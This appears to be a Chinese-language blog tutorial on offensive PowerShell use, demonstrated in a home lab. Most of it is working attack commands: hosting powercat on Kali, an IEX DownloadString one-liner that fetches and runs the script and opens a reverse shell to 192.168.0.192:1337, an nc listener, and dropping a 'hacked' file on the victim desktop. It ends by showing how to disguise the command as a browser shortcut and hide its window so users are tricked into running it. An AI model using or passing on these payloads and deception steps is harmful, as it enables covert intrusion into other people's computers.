相关阅读
视频讲解
图文讲解
Powershell可以做什么?
比方说创建一个文件
New-Item -Path '.\newfile.txt' -ItemType File
![图片[1]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923024142870-1024x584.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
可以看到文件成功创建了
![图片[2]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923031042616.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
当然,Powershell能玩的不止这些!
你还可以下载文件到本地
譬如,我们下载内网的资源
wget "http://192.168.0.192/default/ps1" -outfile "C:\users\loiliangyang\Desktop\default.ps1"
![图片[3]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923031518695-1024x574.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们可以看到运行完命令后,文件已经下载到桌面上了
![图片[4]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923031645903-1024x582.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
使用Kali linux托管文件
启动Apache服务
systemctl start apache2.service
下载要投递的恶意文件
使用kali linux下载我们要投递的恶意文件
wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
![图片[5]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923032833732-1024x518.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
将我们想要发给目标用户的文件存储在/var/www/html
目录下
cp powercat.ps1 /var/www/html/powercat.ps1
![图片[6]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923032905941-1024x579.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
如何让powershell下载并运行文件?
通常我们使用powershell下载文件,使用下面的命令就好了
powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1')"
这里我们想要他下载完成后运行,则可以使用;
进行下一步操作
powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1');powercat -c 192.168.0.192 -p 1337 -e cmd"
这里相当于要完成一个反弹shell,将终端转到192.168.0.192的1337端口,因此在运行下面命令前,我们需要到kali上进行设置
nc -nlvp 1337
![图片[7]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923033551149.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
然后在运行刚才的windows powershell命令
![图片[8]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923033625819-1024x77.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
之后神奇的事情就发生了,我们可以使用kali linux向windows终端发送命令
![图片[9]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923033654180-1024x559.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
譬如我们想创建一个文件告诉电脑已经被入侵
我们进入windows的桌面位置
cd Desktop
然后创建一个you have been hacked by mr hacker loi
(你已经被hackerloi黑了)的hacked.txt文件
echo "you have been hacked by mr hacker loi" > hacked.txt
![图片[10]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923034016555-1024x563.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们甚至还可以使用notepad
命令打开这个文件
notepad hacked.txt
![图片[11]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923034146990.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
这看起来有些嚣张了……返回windows电脑,可以看到弹出的txt文本提示电脑已经被黑了
![图片[12]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923034231445-1024x579.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
小技巧:使用快捷方式混淆
很多热心网友表示,用户通常不会自己打开这些恶意文件,那么也不是没有办法,我们可以将其伪装成一些特定的快捷方式,比方说浏览器
![图片[13]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923034327941-1024x576.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
我们可以右键属性看下打开浏览器实际会访问的目标
![图片[14]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923034400773.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
可以看到目标居然是我们刚才的命令
![图片[15]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923034456352.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1');powercat -c 192.168.0.192 -p 1337 -e cmd"
这里powershell.exe会根据你电脑实际的路径进行补全,譬如变成
C:\Windows\System32\WindowsPowerShell\V1.0\powershell.exe -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1');powercat -c 192.168.0.192 -p 1337 -e cmd"
但是我们点击这个伪装的快捷方式
![图片[16]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923034818952.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
会发现有一个很假的事情,就是这个黑色的弹窗会一直保留
![图片[17]-【视频讲解】PowerShell中的黑客技术-FancyPig's blog](https://static.iculture.cc/wp-content/uploads/2022/09/20220923034720792-1024x574.png?x-oss-process=image/auto-orient,1/format,webp/watermark,image_cHVibGljL2xvZ28ucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTA,x_10,y_10)
那么如何进行优化呢?很简单!
在之前的powershell.exe
命令后面增加-w h
即可隐藏窗口
C:\Windows\System32\WindowsPowerShell\V1.0\powershell.exe -w h -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.192/powercat.ps1');powercat -c 192.168.0.192 -p 1337 -e cmd"
这样再打开就会自动隐藏了,是不是很有趣呢?
- 最新
- 最热
只看作者